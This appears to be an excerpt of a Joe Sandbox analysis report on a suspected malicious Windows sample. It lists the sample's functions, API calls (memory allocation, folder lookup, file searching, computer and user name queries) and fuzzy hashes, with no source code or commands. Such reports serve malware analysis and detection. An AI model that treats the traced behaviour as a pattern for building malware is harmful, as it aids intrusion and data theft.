Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID:
API String ID: 2104210347-0
Opcode ID: bdd0d7606708ec6ac506f1e830db28bcf205377a50a6100ac97f0bac5ff7e3dc
Instruction ID: 5b73a160bbdb8eaae4e661891a5e0615d6730bb733075af038ef6964ffd5baa5
Opcode Fuzzy Hash: bdd0d7606708ec6ac506f1e830db28bcf205377a50a6100ac97f0bac5ff7e3dc
Instruction Fuzzy Hash: F2410BB750020467E755F7A0EC43EEE337DA795300F008549BD456B196EE756BCC8B92

Function 00346660 Relevance: 2.6, APIs: 2, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,00003000,00000040), ref: 00346706
VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00346753

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: b1918cebb974407e34fc6fda42160d945d35feb49db62db560e6fe3029941a13
Instruction ID: 1cf78be1b61857718cccd923558bea349974784d47a10c059ed306062e1b8f43
Opcode Fuzzy Hash: b1918cebb974407e34fc6fda42160d945d35feb49db62db560e6fe3029941a13
Instruction Fuzzy Hash: 6341E674A00208EFCB44CF98C495BADBBB1FF48314F2482A9E8499F341D735AA81CF85

Function 00355050 Relevance: 2.5, APIs: 2, Instructions: 48stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00358DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00358E0B

lstrcat.KERNEL32(?,00000000), ref: 0035508A
lstrcat.KERNEL32(?,0127E490), ref: 003550A8

Part of subcall function 00354910: wsprintfA.USER32 ref: 0035492C
Part of subcall function 00354910: FindFirstFileA.KERNEL32(?,?), ref: 00354943

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$FileFindFirstFolderPathwsprintf
String ID:
API String ID: 2699682494-0
Opcode ID: be0c45d0a62aac5c063352a4e42231a21afbba9d3c1bb8a9a1c30020e1b0cdd1
Instruction ID: 79f454e3abf9394eaf694455635fd06d0d596b1364bf97aa3291ccf7c10da4d4
Opcode Fuzzy Hash: be0c45d0a62aac5c063352a4e42231a21afbba9d3c1bb8a9a1c30020e1b0cdd1
Instruction Fuzzy Hash: AB01D67690020867D755FBB0DC47EEE337CAB64301F004185BA4A6A091EE74AACDDBA2

Function 003410A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 003410B3
VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 003410F7

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 66769a9fd8544d901a5484ec3fffafb11aaea8f856139ba2661dc1d3f54a3681
Instruction ID: 38812c7dca60289d99d36021b221bd454364c06f323ab752fa2003c314e82581
Opcode Fuzzy Hash: 66769a9fd8544d901a5484ec3fffafb11aaea8f856139ba2661dc1d3f54a3681
Instruction Fuzzy Hash: F2F0E271641208BBE7149BA4AC49FAAB7E8E705B15F301448F904E7280E571AE44DBA0

Function 00358D90 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,00341B54,?,?,0036564C,?,?,00360E1F), ref: 00358D9F

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 41b7c9db05337136c142f291636b1d230a4e2a554fa9d4d464c8c3b73daf1a0a
Instruction ID: 6acda851be66ab2c57c004639eb1993b6e604e9646718e8db20e8e5f6622d9eb
Opcode Fuzzy Hash: 41b7c9db05337136c142f291636b1d230a4e2a554fa9d4d464c8c3b73daf1a0a
Instruction Fuzzy Hash: 2AF0AC70C00208EBDB05EF94D545ADCBBB4EB10312F508299DC556B2E1DB755A59EF81

Function 00358DE0 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00358E0B

Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: FolderPathlstrcpy
String ID:
API String ID: 1699248803-0
Opcode ID: c4f6b45b3eb73348b50d8ed7ba010f007864b898076e6979cf73702efa27d78a
Instruction ID: bdab7edc5b4cc1710edc16ff1280a06d864f2891aa3272c75ce68fce63e3be80
Opcode Fuzzy Hash: c4f6b45b3eb73348b50d8ed7ba010f007864b898076e6979cf73702efa27d78a
Instruction Fuzzy Hash: 91E0123194034C6BDB51DB90CC96FAD777C9B44B01F004295BE0C5A1D0DE70AB898B91

Function 00341190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 003578E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00357910
Part of subcall function 003578E0: RtlAllocateHeap.NTDLL(00000000), ref: 00357917
Part of subcall function 003578E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0035792F

Part of subcall function 00357850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,003411B7), ref: 00357880
Part of subcall function 00357850: RtlAllocateHeap.NTDLL(00000000), ref: 00357887
Part of subcall function 00357850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0035789F

ExitProcess.KERNEL32 ref: 003411C6

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateName$ComputerExitUser
String ID:
API String ID: 3550813701-0
Opcode ID: 9ff5723d009bd4b120970f87786c61783b28a4049763ebc4665950e9c9fc28b1
Instruction ID: 9ea1172836815cee43c54cda6eb28ffdd35e4a04b16087319b7c52c3344b57fc
Opcode Fuzzy Hash: 9ff5723d009bd4b120970f87786c61783b28a4049763ebc4665950e9c9fc28b1
Instruction Fuzzy Hash: 00E012B591430153DE0173B1BC0BF2A339C5B24347F041425FE05EB122FE29F848966A

Function 005A2C33 Relevance: 1.3, APIs: 1, Instructions: 15memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000), ref: 005A2C4B

Memory Dump Source

Source File: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: aa7c836f908083906836909392ea6299b661373a9b99c6ae6b6351e8df3f31d5
Instruction ID: 829d7b3c4a59dc848349de3c9af2a15efcb1adb4915cbf4de0de0b60d71b9936
Opcode Fuzzy Hash: aa7c836f908083906836909392ea6299b661373a9b99c6ae6b6351e8df3f31d5
Instruction Fuzzy Hash: 6FE0ECB110870D8BDB043F6898496EE7BA4EF05312F550628E96183A80EA315C50CA4A

Non-executed Functions

Function 003538B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 003538CC
FindFirstFileA.KERNEL32(?,?), ref: 003538E3
lstrcat.KERNEL32(?,?), ref: 00353935
StrCmpCA.SHLWAPI(?,00360F70), ref: 00353947
StrCmpCA.SHLWAPI(?,00360F74), ref: 0035395D
FindNextFileA.KERNEL32(000000FF,?), ref: 00353C67
FindClose.KERNEL32(000000FF), ref: 00353C7C

